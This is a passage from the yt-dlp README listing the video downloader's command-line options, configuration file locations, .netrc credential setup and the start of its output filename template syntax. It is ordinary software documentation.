Print program version and exit -U, --update Update this program to the latest version --no-update Do not check for updates (default) --update-to [CHANNEL]@[TAG] Upgrade/downgrade to a specific version. CHANNEL can be a repository as well. CHANNEL and TAG default to "stable" and "latest" respectively if omitted; See "UPDATE" for details. Supported channels: stable, nightly -i, --ignore-errors Ignore download and postprocessing errors. The download will be considered successful even if the postprocessing fails --no-abort-on-error Continue with next video on download errors; e.g. to skip unavailable videos in a playlist (default) --abort-on-error Abort downloading of further videos if an error occurs (Alias: --no-ignore-errors) --dump-user-agent Display the current user-agent and exit --list-extractors List all supported extractors and exit --extractor-descriptions Output descriptions of all supported extractors and exit --use-extractors NAMES Extractor names to use separated by commas. You can also use regexes, "all", "default" and "end" (end URL matching); e.g. --ies "holodex.*,end,youtube". Prefix the name with a "-" to exclude it, e.g. --ies default,-generic. Use --list-extractors for a list of extractor names. (Alias: --ies) --default-search PREFIX Use this prefix for unqualified URLs. E.g. "gvsearch2:python" downloads two videos from google videos for the search term "python". Use the value "auto" to let yt-dlp guess ("auto_warning" to emit a warning when guessing). "error" just throws an error. The default value "fixup_error" repairs broken URLs, but emits an error if this is not possible instead of searching --ignore-config Don't load any more configuration files except those given by --config-locations. For backward compatibility, if this option is found inside the system configuration file, the user configuration is not loaded. (Alias: --no-config) --no-config-locations Do not load any custom configuration files (default). When given inside a configuration file, ignore all previous --config-locations defined in the current file --config-locations PATH Location of the main configuration file; either the path to the config or its containing directory ("-" for stdin). Can be used multiple times and inside other configuration files --flat-playlist Do not extract the videos of a playlist, only list them --no-flat-playlist Fully extract the videos of a playlist (default) --live-from-start Download livestreams from the start. Currently only supported for YouTube (Experimental) --no-live-from-start Download livestreams from the current time (default) --wait-for-video MIN[-MAX] Wait for scheduled streams to become available. Pass the minimum number of seconds (or range) to wait between retries --no-wait-for-video Do not wait for scheduled streams (default) --mark-watched Mark videos watched (even with --simulate) --no-mark-watched Do not mark videos watched (default) --color [STREAM:]POLICY Whether to emit color codes in output, optionally prefixed by the STREAM (stdout or stderr) to apply the setting to. Can be one of "always", "auto" (default), "never", or "no_color" (use non color terminal sequences). Can be used multiple times --compat-options OPTS Options that can help keep compatibility with youtube-dl or youtube-dlc configurations by reverting some of the changes made in yt-dlp. See "Differences in default behavior" for details --alias ALIASES OPTIONS Create aliases for an option string. Unless an alias starts with a dash "-", it is prefixed with "--". Arguments are parsed according to the Python string formatting mini-language. E.g. --alias get-audio,-X "-S=aext:{0},abr -x --audio-format {0}" creates options "--get-audio" and "-X" that takes an argument (ARG0) and expands to "-S=aext:ARG0,abr -x --audio-format ARG0". All defined aliases are listed in the --help output. Alias options can trigger more aliases; so be careful to avoid defining recursive options. As a safety measure, each alias may be triggered a maximum of 100 times. This option can be used multiple times ## Network Options: --proxy URL Use the specified HTTP/HTTPS/SOCKS proxy. To enable SOCKS proxy, specify a proper scheme, e.g. socks5://user:[email protected]:1080/. Pass in an empty string (--proxy "") for direct connection --socket-timeout SECONDS Time to wait before giving up, in seconds --source-address IP Client-side IP address to bind to -4, --force-ipv4 Make all connections via IPv4 -6, --force-ipv6 Make all connections via IPv6 --enable-file-urls Enable file:// URLs. This is disabled by default for security reasons. ## Geo-restriction: --geo-verification-proxy URL Use this proxy to verify the IP address for some geo-restricted sites. The default proxy specified by --proxy (or none, if the option is not present) is used for the actual downloading --xff VALUE How to fake X-Forwarded-For HTTP header to try bypassing geographic restriction. One of "default" (only when known to be useful), "never", an IP block in CIDR notation, or a two-letter ISO 3166-2 country code ## Video Selection: -I, --playlist-items ITEM_SPEC Comma separated playlist_index of the items to download. You can specify a range using "[START]:[STOP][:STEP]". For backward compatibility, START-STOP is also supported. Use negative indices to count from the right and negative STEP to download in reverse order. E.g. "-I 1:3,7,-5::2" used on a playlist of size 15 will download the items at index 1,2,3,7,11,13,15 --min-filesize SIZE Abort download if filesize is smaller than SIZE, e.g. 50k or 44.6M --max-filesize SIZE Abort download if filesize is larger than SIZE, e.g. 50k or 44.6M --date DATE Download only videos uploaded on this date. The date can be "YYYYMMDD" or in the format [now|today|yesterday][-N[day|week|month|year]]. E.g. "--date today-2weeks" downloads only videos uploaded on the same day two weeks ago --datebefore DATE Download only videos uploaded on or before this date. The date formats accepted is the same as --date --dateafter DATE Download only videos uploaded on or after this date. The date formats accepted is the same as --date --match-filters FILTER Generic video filter. Any "OUTPUT TEMPLATE" field can be compared with a number or a string using the operators defined in "Filtering Formats". You can also simply specify a field to match if the field is present, use "!field" to check if the field is not present, and "&" to check multiple conditions. Use a "\" to escape "&" or quotes if needed. If used multiple times, the filter matches if atleast one of the conditions are met. E.g. --match-filter !is_live --match-filter "like_count>?100 & description~='(?i)\bcats \& dogs\b'" matches only videos that are not live OR those that have a like count more than 100 (or the like field is not available) and also has a description that contains the phrase "cats & dogs" (caseless). Use "--match-filter -" to interactively ask whether to download each video --no-match-filters Do not use any --match-filter (default) --break-match-filters FILTER Same as "--match-filters" but stops the download process when a video is rejected --no-break-match-filters Do not use any --break-match-filters (default) --no-playlist Download only the video, if the URL refers to a video and a playlist --yes-playlist Download the playlist, if the URL refers to a video and a playlist --age-limit YEARS Download only videos suitable for the given age --download-archive FILE Download only videos not listed in the archive file. Record the IDs of all downloaded videos in it --no-download-archive Do not use archive file (default) --max-downloads NUMBER Abort after downloading NUMBER files --break-on-existing Stop the download process when encountering a file that is in the archive --break-per-input Alters --max-downloads, --break-on-existing, --break-match-filter, and autonumber to reset per input URL --no-break-per-input --break-on-existing and similar options terminates the entire download queue --skip-playlist-after-errors N Number of allowed failures until the rest of the playlist is skipped ## Download Options: -N, --concurrent-fragments N Number of fragments of a dash/hlsnative video that should be downloaded concurrently (default is 1) -r, --limit-rate RATE Maximum download rate in bytes per second, e.g. 50K or 4.2M --throttled-rate RATE Minimum download rate in bytes per second below which throttling is assumed and the video data is re-extracted, e.g. 100K -R, --retries RETRIES Number of retries (default is 10), or "infinite" --file-access-retries RETRIES Number of times to retry on file access error (default is 3), or "infinite" --fragment-retries RETRIES Number of retries for a fragment (default is 10), or "infinite" (DASH, hlsnative and ISM) --retry-sleep [TYPE:]EXPR Time to sleep between retries in seconds (optionally) prefixed by the type of retry (http (default), fragment, file_access, extractor) to apply the sleep to. EXPR can be a number, linear=START[:END[:STEP=1]] or exp=START[:END[:BASE=2]]. This option can be used multiple times to set the sleep for the different retry types, e.g. --retry-sleep linear=1::2 --retry-sleep fragment:exp=1:20 --skip-unavailable-fragments Skip unavailable fragments for DASH, hlsnative and ISM downloads (default) (Alias: --no-abort-on-unavailable-fragments) --abort-on-unavailable-fragments Abort download if a fragment is unavailable (Alias: --no-skip-unavailable-fragments) --keep-fragments Keep downloaded fragments on disk after downloading is finished --no-keep-fragments Delete downloaded fragments after downloading is finished (default) --buffer-size SIZE Size of download buffer, e.g. 1024 or 16K (default is 1024) --resize-buffer The buffer size is automatically resized from an initial value of --buffer-size (default) --no-resize-buffer Do not automatically adjust the buffer size --http-chunk-size SIZE Size of a chunk for chunk-based HTTP downloading, e.g. 10485760 or 10M (default is disabled). May be useful for bypassing bandwidth throttling imposed by a webserver (experimental) --playlist-random Download playlist videos in random order --lazy-playlist Process entries in the playlist as they are received. This disables n_entries, --playlist-random and --playlist-reverse --no-lazy-playlist Process videos in the playlist only after the entire playlist is parsed (default) --xattr-set-filesize Set file xattribute ytdl.filesize with expected file size --hls-use-mpegts Use the mpegts container for HLS videos; allowing some players to play the video while downloading, and reducing the chance of file corruption if download is interrupted. This is enabled by default for live streams --no-hls-use-mpegts Do not use the mpegts container for HLS videos. This is default when not downloading live streams --download-sections REGEX Download only chapters that match the regular expression. A "*" prefix denotes time-range instead of chapter. Negative timestamps are calculated from the end. "*from-url" can be used to download between the "start_time" and "end_time" extracted from the URL. Needs ffmpeg. This option can be used multiple times to download multiple sections, e.g. --download-sections "*10:15-inf" --download-sections "intro" --downloader [PROTO:]NAME Name or path of the external downloader to use (optionally) prefixed by the protocols (http, ftp, m3u8, dash, rstp, rtmp, mms) to use it for. Currently supports native, aria2c, avconv, axel, curl, ffmpeg, httpie, wget. You can use this option multiple times to set different downloaders for different protocols. E.g. --downloader aria2c --downloader "dash,m3u8:native" will use aria2c for http/ftp downloads, and the native downloader for dash/m3u8 downloads (Alias: --external-downloader) --downloader-args NAME:ARGS Give these arguments to the external downloader. Specify the downloader name and the arguments separated by a colon ":". For ffmpeg, arguments can be passed to different positions using the same syntax as --postprocessor-args. You can use this option multiple times to give different arguments to different downloaders (Alias: --external-downloader-args) ## Filesystem Options: -a, --batch-file FILE File containing URLs to download ("-" for stdin), one URL per line. Lines starting with "#", ";" or "]" are considered as comments and ignored --no-batch-file Do not read URLs from batch file (default) -P, --paths [TYPES:]PATH The paths where the files should be downloaded. Specify the type of file and the path separated by a colon ":". All the same TYPES as --output are supported. Additionally, you can also provide "home" (default) and "temp" paths. All intermediary files are first downloaded to the temp path and then the final files are moved over to the home path after download is finished. This option is ignored if --output is an absolute path -o, --output [TYPES:]TEMPLATE Output filename template; see "OUTPUT TEMPLATE" for details --output-na-placeholder TEXT Placeholder for unavailable fields in "OUTPUT TEMPLATE" (default: "NA") --restrict-filenames Restrict filenames to only ASCII characters, and avoid "&" and spaces in filenames --no-restrict-filenames Allow Unicode characters, "&" and spaces in filenames (default) --windows-filenames Force filenames to be Windows-compatible --no-windows-filenames Make filenames Windows-compatible only if using Windows (default) --trim-filenames LENGTH Limit the filename length (excluding extension) to the specified number of characters -w, --no-overwrites Do not overwrite any files --force-overwrites Overwrite all video and metadata files. This option includes --no-continue --no-force-overwrites Do not overwrite the video, but overwrite related files (default) -c, --continue Resume partially downloaded files/fragments (default) --no-continue Do not resume partially downloaded fragments. If the file is not fragmented, restart download of the entire file --part Use .part files instead of writing directly into output file (default) --no-part Do not use .part files - write directly into output file --mtime Use the Last-modified header to set the file modification time (default) --no-mtime Do not use the Last-modified header to set the file modification time --write-description Write video description to a .description file --no-write-description Do not write video description (default) --write-info-json Write video metadata to a .info.json file (this may contain personal information) --no-write-info-json Do not write video metadata (default) --write-playlist-metafiles Write playlist metadata in addition to the video metadata when using --write-info-json, --write-description etc. (default) --no-write-playlist-metafiles Do not write playlist metadata when using --write-info-json, --write-description etc. --clean-info-json Remove some internal metadata such as filenames from the infojson (default) --no-clean-info-json Write all fields to the infojson --write-comments Retrieve video comments to be placed in the infojson. The comments are fetched even without this option if the extraction is known to be quick (Alias: --get-comments) --no-write-comments Do not retrieve video comments unless the extraction is known to be quick (Alias: --no-get-comments) --load-info-json FILE JSON file containing the video information (created with the "--write-info-json" option) --cookies FILE Netscape formatted file to read cookies from and dump cookie jar in --no-cookies Do not read/dump cookies from/to file (default) --cookies-from-browser BROWSER[+KEYRING][:PROFILE][::CONTAINER] The name of the browser to load cookies from. Currently supported browsers are: brave, chrome, chromium, edge, firefox, opera, safari, vivaldi. Optionally, the KEYRING used for decrypting Chromium cookies on Linux, the name/path of the PROFILE to load cookies from, and the CONTAINER name (if Firefox) ("none" for no container) can be given with their respective seperators. By default, all containers of the most recently accessed profile are used. Currently supported keyrings are: basictext, gnomekeyring, kwallet, kwallet5, kwallet6 --no-cookies-from-browser Do not load cookies from browser (default) --cache-dir DIR Location in the filesystem where yt-dlp can store some downloaded information (such as client ids and signatures) permanently. By default ${XDG_CACHE_HOME}/yt-dlp --no-cache-dir Disable filesystem caching --rm-cache-dir Delete all filesystem cache files ## Thumbnail Options: --write-thumbnail Write thumbnail image to disk --no-write-thumbnail Do not write thumbnail image to disk (default) --write-all-thumbnails Write all thumbnail image formats to disk --list-thumbnails List available thumbnails of each video. Simulate unless --no-simulate is used ## Internet Shortcut Options: --write-link Write an internet shortcut file, depending on the current platform (.url, .webloc or .desktop). The URL may be cached by the OS --write-url-link Write a .url Windows internet shortcut. The OS caches the URL based on the file path --write-webloc-link Write a .webloc macOS internet shortcut --write-desktop-link Write a .desktop Linux internet shortcut ## Verbosity and Simulation Options: -q, --quiet Activate quiet mode. If used with --verbose, print the log to stderr --no-quiet Deactivate quiet mode. (Default) --no-warnings Ignore warnings -s, --simulate Do not download the video and do not write anything to disk --no-simulate Download the video even if printing/listing options are used --ignore-no-formats-error Ignore "No video formats" error. Useful for extracting metadata even if the videos are not actually available for download (experimental) --no-ignore-no-formats-error Throw error when no downloadable video formats are found (default) --skip-download Do not download the video but write all related files (Alias: --no-download) -O, --print [WHEN:]TEMPLATE Field name or output template to print to screen, optionally prefixed with when to print it, separated by a ":". Supported values of "WHEN" are the same as that of --use-postprocessor (default: video). Implies --quiet. Implies --simulate unless --no-simulate or later stages of WHEN are used. This option can be used multiple times --print-to-file [WHEN:]TEMPLATE FILE Append given template to the file. The values of WHEN and TEMPLATE are same as that of --print. FILE uses the same syntax as the output template. This option can be used multiple times -j, --dump-json Quiet, but print JSON information for each video. Simulate unless --no-simulate is used. See "OUTPUT TEMPLATE" for a description of available keys -J, --dump-single-json Quiet, but print JSON information for each url or infojson passed. Simulate unless --no-simulate is used. If the URL refers to a playlist, the whole playlist information is dumped in a single line --force-write-archive Force download archive entries to be written as far as no errors occur, even if -s or another simulation option is used (Alias: --force-download-archive) --newline Output progress bar as new lines --no-progress Do not print progress bar --progress Show progress bar, even if in quiet mode --console-title Display progress in console titlebar --progress-template [TYPES:]TEMPLATE Template for progress outputs, optionally prefixed with one of "download:" (default), "download-title:" (the console title), "postprocess:", or "postprocess-title:". The video's fields are accessible under the "info" key and the progress attributes are accessible under "progress" key. E.g. --console-title --progress-template "download-title:%(info.id)s-%(progress.eta)s" -v, --verbose Print various debugging information --dump-pages Print downloaded pages encoded using base64 to debug problems (very verbose) --write-pages Write downloaded intermediary pages to files in the current directory to debug problems --print-traffic Display sent and read HTTP traffic ## Workarounds: --encoding ENCODING Force the specified encoding (experimental) --legacy-server-connect Explicitly allow HTTPS connection to servers that do not support RFC 5746 secure renegotiation --no-check-certificates Suppress HTTPS certificate validation --prefer-insecure Use an unencrypted connection to retrieve information about the video (Currently supported only for YouTube) --add-headers FIELD:VALUE Specify a custom HTTP header and its value, separated by a colon ":". You can use this option multiple times --bidi-workaround Work around terminals that lack bidirectional text support. Requires bidiv or fribidi executable in PATH --sleep-requests SECONDS Number of seconds to sleep between requests during data extraction --sleep-interval SECONDS Number of seconds to sleep before each download. This is the minimum time to sleep when used along with --max-sleep-interval (Alias: --min-sleep-interval) --max-sleep-interval SECONDS Maximum number of seconds to sleep. Can only be used along with --min-sleep-interval --sleep-subtitles SECONDS Number of seconds to sleep before each subtitle download ## Video Format Options: -f, --format FORMAT Video format code, see "FORMAT SELECTION" for more details -S, --format-sort SORTORDER Sort the formats by the fields given, see "Sorting Formats" for more details --format-sort-force Force user specified sort order to have precedence over all fields, see "Sorting Formats" for more details (Alias: --S-force) --no-format-sort-force Some fields have precedence over the user specified sort order (default) --video-multistreams Allow multiple video streams to be merged into a single file --no-video-multistreams Only one video stream is downloaded for each output file (default) --audio-multistreams Allow multiple audio streams to be merged into a single file --no-audio-multistreams Only one audio stream is downloaded for each output file (default) --prefer-free-formats Prefer video formats with free containers over non-free ones of same quality. Use with "-S ext" to strictly prefer free containers irrespective of quality --no-prefer-free-formats Don't give any special preference to free containers (default) --check-formats Make sure formats are selected only from those that are actually downloadable --check-all-formats Check all formats for whether they are actually downloadable --no-check-formats Do not check that the formats are actually downloadable -F, --list-formats List available formats of each video. Simulate unless --no-simulate is used --merge-output-format FORMAT Containers that may be used when merging formats, separated by "/", e.g. "mp4/mkv". Ignored if no merge is required. (currently supported: avi, flv, mkv, mov, mp4, webm) ## Subtitle Options: --write-subs Write subtitle file --no-write-subs Do not write subtitle file (default) --write-auto-subs Write automatically generated subtitle file (Alias: --write-automatic-subs) --no-write-auto-subs Do not write auto-generated subtitles (default) (Alias: --no-write-automatic-subs) --list-subs List available subtitles of each video. Simulate unless --no-simulate is used --sub-format FORMAT Subtitle format; accepts formats preference, e.g. "srt" or "ass/srt/best" --sub-langs LANGS Languages of the subtitles to download (can be regex) or "all" separated by commas, e.g. --sub-langs "en.*,ja". You can prefix the language code with a "-" to exclude it from the requested languages, e.g. --sub-langs all,-live_chat. Use --list-subs for a list of available language tags ## Authentication Options: -u, --username USERNAME Login with this account ID -p, --password PASSWORD Account password. If this option is left out, yt-dlp will ask interactively -2, --twofactor TWOFACTOR Two-factor authentication code -n, --netrc Use .netrc authentication data --netrc-location PATH Location of .netrc authentication data; either the path or its containing directory. Defaults to ~/.netrc --netrc-cmd NETRC_CMD Command to execute to get the credentials for an extractor. --video-password PASSWORD Video password (vimeo, youku) --ap-mso MSO Adobe Pass multiple-system operator (TV provider) identifier, use --ap-list-mso for a list of available MSOs --ap-username USERNAME Multiple-system operator account login --ap-password PASSWORD Multiple-system operator account password. If this option is left out, yt-dlp will ask interactively --ap-list-mso List all supported multiple-system operators --client-certificate CERTFILE Path to client certificate file in PEM format. May include the private key --client-certificate-key KEYFILE Path to private key file for client certificate --client-certificate-password PASSWORD Password for client certificate private key, if encrypted. If not provided, and the key is encrypted, yt-dlp will ask interactively ## Post-Processing Options: -x, --extract-audio Convert video files to audio-only files (requires ffmpeg and ffprobe) --audio-format FORMAT Format to convert the audio to when -x is used. (currently supported: best (default), aac, alac, flac, m4a, mp3, opus, vorbis, wav). You can specify multiple rules using similar syntax as --remux-video --audio-quality QUALITY Specify ffmpeg audio quality to use when converting the audio with -x. Insert a value between 0 (best) and 10 (worst) for VBR or a specific bitrate like 128K (default 5) --remux-video FORMAT Remux the video into another container if necessary (currently supported: avi, flv, gif, mkv, mov, mp4, webm, aac, aiff, alac, flac, m4a, mka, mp3, ogg, opus, vorbis, wav). If target container does not support the video/audio codec, remuxing will fail. You can specify multiple rules; e.g. "aac>m4a/mov>mp4/mkv" will remux aac to m4a, mov to mp4 and anything else to mkv --recode-video FORMAT Re-encode the video into another format if necessary. The syntax and supported formats are the same as --remux-video --postprocessor-args NAME:ARGS Give these arguments to the postprocessors. Specify the postprocessor/executable name and the arguments separated by a colon ":" to give the argument to the specified postprocessor/executable. Supported PP are: Merger, ModifyChapters, SplitChapters, ExtractAudio, VideoRemuxer, VideoConvertor, Metadata, EmbedSubtitle, EmbedThumbnail, SubtitlesConvertor, ThumbnailsConvertor, FixupStretched, FixupM4a, FixupM3u8, FixupTimestamp and FixupDuration. The supported executables are: AtomicParsley, FFmpeg and FFprobe. You can also specify "PP+EXE:ARGS" to give the arguments to the specified executable only when being used by the specified postprocessor. Additionally, for ffmpeg/ffprobe, "_i"/"_o" can be appended to the prefix optionally followed by a number to pass the argument before the specified input/output file, e.g. --ppa "Merger+ffmpeg_i1:-v quiet". You can use this option multiple times to give different arguments to different postprocessors. (Alias: --ppa) -k, --keep-video Keep the intermediate video file on disk after post-processing --no-keep-video Delete the intermediate video file after post-processing (default) --post-overwrites Overwrite post-processed files (default) --no-post-overwrites Do not overwrite post-processed files --embed-subs Embed subtitles in the video (only for mp4, webm and mkv videos) --no-embed-subs Do not embed subtitles (default) --embed-thumbnail Embed thumbnail in the video as cover art --no-embed-thumbnail Do not embed thumbnail (default) --embed-metadata Embed metadata to the video file. Also embeds chapters/infojson if present unless --no-embed-chapters/--no-embed-info-json are used (Alias: --add-metadata) --no-embed-metadata Do not add metadata to file (default) (Alias: --no-add-metadata) --embed-chapters Add chapter markers to the video file (Alias: --add-chapters) --no-embed-chapters Do not add chapter markers (default) (Alias: --no-add-chapters) --embed-info-json Embed the infojson as an attachment to mkv/mka video files --no-embed-info-json Do not embed the infojson as an attachment to the video file --parse-metadata [WHEN:]FROM:TO Parse additional metadata like title/artist from other fields; see "MODIFYING METADATA" for details. Supported values of "WHEN" are the same as that of --use-postprocessor (default: pre_process) --replace-in-metadata [WHEN:]FIELDS REGEX REPLACE Replace text in a metadata field using the given regex. This option can be used multiple times. Supported values of "WHEN" are the same as that of --use-postprocessor (default: pre_process) --xattrs Write metadata to the video file's xattrs (using dublin core and xdg standards) --concat-playlist POLICY Concatenate videos in a playlist. One of "never", "always", or "multi_video" (default; only when the videos form a single show). All the video files must have same codecs and number of streams to be concatable. The "pl_video:" prefix can be used with "--paths" and "--output" to set the output filename for the concatenated files. See "OUTPUT TEMPLATE" for details --fixup POLICY Automatically correct known faults of the file. One of never (do nothing), warn (only emit a warning), detect_or_warn (the default; fix file if we can, warn otherwise), force (try fixing even if file already exists) --ffmpeg-location PATH Location of the ffmpeg binary; either the path to the binary or its containing directory --exec [WHEN:]CMD Execute a command, optionally prefixed with when to execute it, separated by a ":". Supported values of "WHEN" are the same as that of --use-postprocessor (default: after_move). Same syntax as the output template can be used to pass any field as arguments to the command. If no fields are passed, %(filepath,_filename|)q is appended to the end of the command. This option can be used multiple times --no-exec Remove any previously defined --exec --convert-subs FORMAT Convert the subtitles to another format (currently supported: ass, lrc, srt, vtt) (Alias: --convert-subtitles) --convert-thumbnails FORMAT Convert the thumbnails to another format (currently supported: jpg, png, webp). You can specify multiple rules using similar syntax as --remux-video --split-chapters Split video into multiple files based on internal chapters. The "chapter:" prefix can be used with "--paths" and "--output" to set the output filename for the split files. See "OUTPUT TEMPLATE" for details --no-split-chapters Do not split video based on chapters (default) --remove-chapters REGEX Remove chapters whose title matches the given regular expression. The syntax is the same as --download-sections. This option can be used multiple times --no-remove-chapters Do not remove any chapters from the file (default) --force-keyframes-at-cuts Force keyframes at cuts when downloading/splitting/removing sections. This is slow due to needing a re-encode, but the resulting video may have fewer artifacts around the cuts --no-force-keyframes-at-cuts Do not force keyframes around the chapters when cutting/splitting (default) --use-postprocessor NAME[:ARGS] The (case sensitive) name of plugin postprocessors to be enabled, and (optionally) arguments to be passed to it, separated by a colon ":". ARGS are a semicolon ";" delimited list of NAME=VALUE. The "when" argument determines when the postprocessor is invoked. It can be one of "pre_process" (after video extraction), "after_filter" (after video passes filter), "video" (after --format; before --print/--output), "before_dl" (before each video download), "post_process" (after each video download; default), "after_move" (after moving video file to it's final locations), "after_video" (after downloading and processing all formats of a video), or "playlist" (at end of playlist). This option can be used multiple times to add different postprocessors ## SponsorBlock Options: Make chapter entries for, or remove various segments (sponsor, introductions, etc.) from downloaded YouTube videos using the [SponsorBlock API](https://sponsor.ajay.app) --sponsorblock-mark CATS SponsorBlock categories to create chapters for, separated by commas. Available categories are sponsor, intro, outro, selfpromo, preview, filler, interaction, music_offtopic, poi_highlight, chapter, all and default (=all). You can prefix the category with a "-" to exclude it. See [1] for description of the categories. E.g. --sponsorblock-mark all,-preview [1] https://wiki.sponsor.ajay.app/w/Segment_Categories --sponsorblock-remove CATS SponsorBlock categories to be removed from the video file, separated by commas. If a category is present in both mark and remove, remove takes precedence. The syntax and available categories are the same as for --sponsorblock-mark except that "default" refers to "all,-filler" and poi_highlight, chapter are not available --sponsorblock-chapter-title TEMPLATE An output template for the title of the SponsorBlock chapters created by --sponsorblock-mark. The only available fields are start_time, end_time, category, categories, name, category_names. Defaults to "[SponsorBlock]: %(category_names)l" --no-sponsorblock Disable both --sponsorblock-mark and --sponsorblock-remove --sponsorblock-api URL SponsorBlock API location, defaults to https://sponsor.ajay.app ## Extractor Options: --extractor-retries RETRIES Number of retries for known extractor errors (default is 3), or "infinite" --allow-dynamic-mpd Process dynamic DASH manifests (default) (Alias: --no-ignore-dynamic-mpd) --ignore-dynamic-mpd Do not process dynamic DASH manifests (Alias: --no-allow-dynamic-mpd) --hls-split-discontinuity Split HLS playlists to different formats at discontinuities such as ad breaks --no-hls-split-discontinuity Do not split HLS playlists to different formats at discontinuities such as ad breaks (default) --extractor-args IE_KEY:ARGS Pass ARGS arguments to the IE_KEY extractor. See "EXTRACTOR ARGUMENTS" for details. You can use this option multiple times to give arguments for different extractors # CONFIGURATION You can configure yt-dlp by placing any supported command line option to a configuration file. The configuration is loaded from the following locations: 1. **Main Configuration**: * The file given by `--config-location` 1. **Portable Configuration**: (Recommended for portable installations) * If using a binary, `yt-dlp.conf` in the same directory as the binary * If running from source-code, `yt-dlp.conf` in the parent directory of `yt_dlp` 1. **Home Configuration**: * `yt-dlp.conf` in the home path given by `-P` * If `-P` is not given, the current directory is searched 1. **User Configuration**: * `${XDG_CONFIG_HOME}/yt-dlp.conf` * `${XDG_CONFIG_HOME}/yt-dlp/config` (recommended on Linux/macOS) * `${XDG_CONFIG_HOME}/yt-dlp/config.txt` * `${APPDATA}/yt-dlp.conf` * `${APPDATA}/yt-dlp/config` (recommended on Windows) * `${APPDATA}/yt-dlp/config.txt` * `~/yt-dlp.conf` * `~/yt-dlp.conf.txt` * `~/.yt-dlp/config` * `~/.yt-dlp/config.txt` See also: [Notes about environment variables](#notes-about-environment-variables) 1. **System Configuration**: * `/etc/yt-dlp.conf` * `/etc/yt-dlp/config` * `/etc/yt-dlp/config.txt` E.g. with the following configuration file yt-dlp will always extract the audio, not copy the mtime, use a proxy and save all videos under `YouTube` directory in your home directory: ``` # Lines starting with # are comments # Always extract audio -x # Do not copy the mtime --no-mtime # Use this proxy --proxy 127.0.0.1:3128 # Save all videos under YouTube directory in your home directory -o ~/YouTube/%(title)s.%(ext)s ``` **Note**: Options in configuration file are just the same options aka switches used in regular command line calls; thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`. They must also be quoted when necessary as-if it were a UNIX shell. You can use `--ignore-config` if you want to disable all configuration files for a particular yt-dlp run. If `--ignore-config` is found inside any configuration file, no further configuration will be loaded. For example, having the option in the portable configuration file prevents loading of home, user, and system configurations. Additionally, (for backward compatibility) if `--ignore-config` is found inside the system configuration file, the user configuration is not loaded. ### Configuration file encoding The configuration files are decoded according to the UTF BOM if present, and in the encoding from system locale otherwise. If you want your file to be decoded differently, add `# coding: ENCODING` to the beginning of the file (e.g. `# coding: shift-jis`). There must be no characters before that, even spaces or BOM. ### Authentication with netrc You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every yt-dlp execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per-extractor basis. For that you will need to create a `.netrc` file in `--netrc-location` and restrict permissions to read/write by only you: ``` touch ${HOME}/.netrc chmod a-rwx,u+rw ${HOME}/.netrc ``` After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase: ``` machine <extractor> login <username> password <password> ``` E.g. ``` machine youtube login [email protected] password my_youtube_password machine twitch login my_twitch_account_name password my_twitch_password ``` To activate authentication with the `.netrc` file you should pass `--netrc` to yt-dlp or place it in the [configuration file](#configuration). The default location of the .netrc file is `~` (see below). As an alternative to using the `.netrc` file, which has the disadvantage of keeping your passwords in a plain text file, you can configure a custom shell command to provide the credentials for an extractor. This is done by providing the `--netrc-cmd` parameter, it shall output the credentials in the netrc format and return `0` on success, other values will be treated as an error. `{}` in the command will be replaced by the name of the extractor to make it possible to select the credentials for the right extractor. E.g. To use an encrypted `.netrc` file stored as `.authinfo.gpg` ``` yt-dlp --netrc-cmd 'gpg --decrypt ~/.authinfo.gpg' https://www.youtube.com/watch?v=BaW_jenozKc ``` ### Notes about environment variables * Environment variables are normally specified as `${VARIABLE}`/`$VARIABLE` on UNIX and `%VARIABLE%` on Windows; but is always shown as `${VARIABLE}` in this documentation * yt-dlp also allow using UNIX-style variables on Windows for path-like options; e.g. `--output`, `--config-location` * If unset, `${XDG_CONFIG_HOME}` defaults to `~/.config` and `${XDG_CACHE_HOME}` to `~/.cache` * On Windows, `~` points to `${HOME}` if present; or, `${USERPROFILE}` or `${HOMEDRIVE}${HOMEPATH}` otherwise * On Windows, `${USERPROFILE}` generally points to `C:\Users\<user name>` and `${APPDATA}` to `${USERPROFILE}\AppData\Roaming` # OUTPUT TEMPLATE The `-o` option is used to indicate a template for the output file names while `-P` option is used to specify the path each type of file should be saved to. <!-- MANPAGE: BEGIN EXCLUDED SECTION --> **tl;dr:** [navigate me to examples](#output-template-examples). <!-- MANPAGE: END EXCLUDED SECTION --> The simplest usage of `-o` is not to set any template arguments when downloading a single file, like in `yt-dlp -o funny_video.flv "https://some/video"` (hard-coding file extension like this is _not_ recommended and could break some post-processing). It may however also contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [Python string formatting operations](https://docs.python.org/3/library/stdtypes.html#printf-style-string-formatting), e.g. `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. The field names themselves (the part inside the parenthesis) can also have some special formatting: 1. **Object traversal**: The dictionaries and lists available in metadata can be traversed by using a dot `.` separator; e.g. `%(tags.0)s`, `%(subtitles.en.-1.ext)s`. You can do Python slicing with colon `:`; E.g. `%(id.3:7:-1)s`, `%(formats.:.format_id)s`. Curly braces `{}` can be used to build dictionaries with only specific keys; e.g. `%(formats.:.{format_id,height})#j`. An empty field name `%()s` refers to the entire infodict; e.g. `%(.{id,title})s`. Note that all the fields that become available using this method are not listed below. Use `-j` to see such fields 1. **Addition**: Addition and subtraction of numeric fields can be done using `+` and `-` respectively. E.g. `%(playlist_index+10)03d`, `%(n_entries+1-playlist_index)d` 1. **Date/time Formatting**: Date/time fields can be formatted according to [strftime formatting](https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes) by specifying it separated from the field name using a `>`. E.g. `%(duration>%H-%M-%S)s`, `%(upload_date>%Y-%m-%d)s`, `%(epoch-3600>%H-%M-%S)s` 1. **Alternatives**: Alternate fields can be specified separated with a `,`. E.g. `%(release_date>%Y,upload_date>%Y|Unknown)s` 1. **Replacement**: A replacement value can be specified using a `&` separator according to the [`str.format` mini-language](https://docs.python.org/3/library/string.html#format-specification-mini-language). If the field is *not* empty, this replacement value will be used instead of the actual field content. This is done after alternate fields are considered; thus the replacement is used if *any* of the alternative fields is *not* empty. E.g. `%(chapters&has chapters|no chapters)s`, `%(title&TITLE={:>20}|NO TITLE)s` 1. 